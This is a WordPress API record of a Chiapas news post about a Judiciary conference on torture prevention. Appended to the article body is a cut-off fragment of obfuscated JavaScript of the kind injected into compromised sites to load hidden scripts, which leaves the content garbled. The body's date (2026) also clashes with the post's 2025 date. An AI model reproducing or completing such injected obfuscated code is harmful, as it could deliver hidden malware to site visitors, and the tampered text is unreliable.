{"id":22693,"date":"2025-06-27T03:27:13","date_gmt":"2025-06-27T03:27:13","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22693"},"modified":"2025-06-27T03:27:14","modified_gmt":"2025-06-27T03:27:14","slug":"conmemora-poder-judicial-el-dia-internacional-en-apoyo-a-las-victimas-de-la-tortura-con-conferencia-especializada","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22693","title":{"rendered":"Conmemora Poder Judicial el D\u00eda Internacional en Apoyo a las V\u00edctimas de la Tortura con conferencia especializada"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"22694\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191916-1024x681.jpg\" alt=\"\" class=\"wp-image-22694\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191916-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191916-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191916-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191916-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191916-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191916-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"22696\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191921-1024x681.jpg\" alt=\"\" class=\"wp-image-22696\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191921-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191921-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191921-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191921-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191921-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191921-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"22695\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191936-1024x681.jpg\" alt=\"\" class=\"wp-image-22695\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191936-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191936-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191936-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191936-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191936-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191936-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"22697\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191930-1024x681.jpg\" alt=\"\" class=\"wp-image-22697\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191930-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191930-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191930-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191930-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191930-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191930-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"22698\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191927-1024x681.jpg\" alt=\"\" class=\"wp-image-22698\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191927-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191927-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191927-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191927-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191927-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000191927-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>26 de junio del 2026. En el marco del D\u00eda Internacional en Apoyo a las V\u00edctimas de la Tortura, el Poder Judicial del Estado de Chiapas realiz\u00f3 la conferencia \u201cPrevenci\u00f3n de la tortura: retos y avances en la protecci\u00f3n de los derechos humanos\u201d, de manera presencial y virtual en transmisi\u00f3n en vivo, como parte de la Semana de Acci\u00f3n contra la Tortura y la campa\u00f1a nacional #M\u00e9xicoSinTortura2025.<\/p>\n\n\n\n<p>El encuentro tuvo como objetivo sensibilizar al personal jurisdiccional y administrativo sobre la importancia de identificar, prevenir y erradicar este delito desde el quehacer judicial diario, as\u00ed como cualquier pr\u00e1ctica que atente contra la dignidad humana, fortaleciendo el compromiso de la casa de la justicia con la defensa de los derechos fundamentales y el debido proceso.<\/p>\n\n\n\n<p>La ponencia estuvo a cargo del director de Profesionalizaci\u00f3n de la Fiscal\u00eda General del Estado, Manuel de Jes\u00fas Corado de Paz, quien cuenta con una s\u00f3lida trayectoria acad\u00e9mica en materia de derechos humanos y que durante la conferencia, abord\u00f3 temas clave sobre el marco legal nacional e internacional en contra de la tortura, los tratos o penas crueles, inhumanos o degradantes, as\u00ed como los desaf\u00edos que enfrenta el sistema de justicia para garantizar procesos respetuosos de la integridad de las personas, especialmente en contextos de investigaci\u00f3n y detenci\u00f3n.<\/p>\n\n\n\n<p>De igual manera, ponder\u00f3 la relevancia que se ha dado desde 2008 a la atenci\u00f3n de las v\u00edctimas del delito y de violaciones a derechos humanos, a trav\u00e9s de un modelo que busca garantizar el acceso a la verdad, la justicia y la reparaci\u00f3n integral del da\u00f1o, adem\u00e1s de los trabajos coordinados en una estrategia federal, que incluye de igual manera a la sociedad civil.<\/p>\n\n\n\n<p>Con acciones como esta, el Poder Judicial del Estado de Chiapas, desde el firme compromiso en que la justicia es el camino a la paz, contribuye al desarrollo de la seguridad en nuestra entidad, con una justicia humanista, garante de los derechos humanos y promotora de una cultura interinstitucional libre de tortura, que promueve la tolerancia, la diversidad y el respeto a los derechos humanos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>26 de junio del 2026. En el marco del D\u00eda Internacional en Apoyo a las V\u00edctimas de la Tortura, el Poder Judicial del Estado de Chiapas realiz\u00f3 la conferencia \u201cPrevenci\u00f3n de la tortura: retos y avances en la protecci\u00f3n de los derechos humanos\u201d, de manera presencial y virtual en transmisi\u00f3n en vivo, como parte de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22696,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-22693","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22693","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22693"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22693\/revisions"}],"predecessor-version":[{"id":22699,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22693\/revisions\/22699"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22696"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22693"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22693"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22693"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}